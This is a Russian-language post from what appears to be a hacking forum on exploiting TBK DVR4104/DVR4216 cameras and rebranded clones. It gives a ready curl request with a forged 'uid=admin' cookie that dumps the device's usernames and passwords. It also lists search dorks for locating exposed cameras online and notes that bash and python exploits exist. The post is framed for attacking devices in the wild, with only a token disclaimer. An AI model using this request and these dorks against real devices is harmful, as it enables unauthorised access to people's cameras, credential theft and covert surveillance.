• XSS.stack #1 – первый литературный журнал от юзеров форума

Эксплуатация DVR камер

XDG12

RAID-массив
Пользователь
Регистрация
09.05.2019
Сообщения
69
Реакции
72
Эксплуатация DVR камер

Серия устройств TBK DVR4104 и DVR4216, а также сторонних производителей на базе этих версий уязвимы к обходу проверки подлинности и
с помощью простого заголовка Cookie: uid = admin можно извлекать учетные данные. Главная проблема заключается не в уязвимости, в подобном оборудовании, они довольно примитивны, а в большом количестве камер подключенных к сети. TBK предлагает множество версий оборудования с цифровым лейблом и ребрендингом оборудования IoT DVR. Многие бренды и интернет-продавцы рекламируют устройства под разными именами, и для некоторых пользователей их может быть сложно обновить.

Проэксплуатировать уязвимость можно отправив запрос:
curl "[URL]http://target/device.rsp?opt=user&cmd=list[/URL]" -H "Cookie: uid=admin"

3310

В ответе вы получите заветные логи и пароль.

Найти камеры можно по доркам:
inurl: login.rsp
intitle: ‘DVR Login’
html: ‘/login.rsp’
‘Server: GNU rsp/1.1’

3311

3312


Для просмотра видео необходим IE с установленным плагином DVR.

3313


Сплойты на bash, python

Статья представлена исключительно в ознакомительных целях, ни одна ссылка не является рекламой.
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх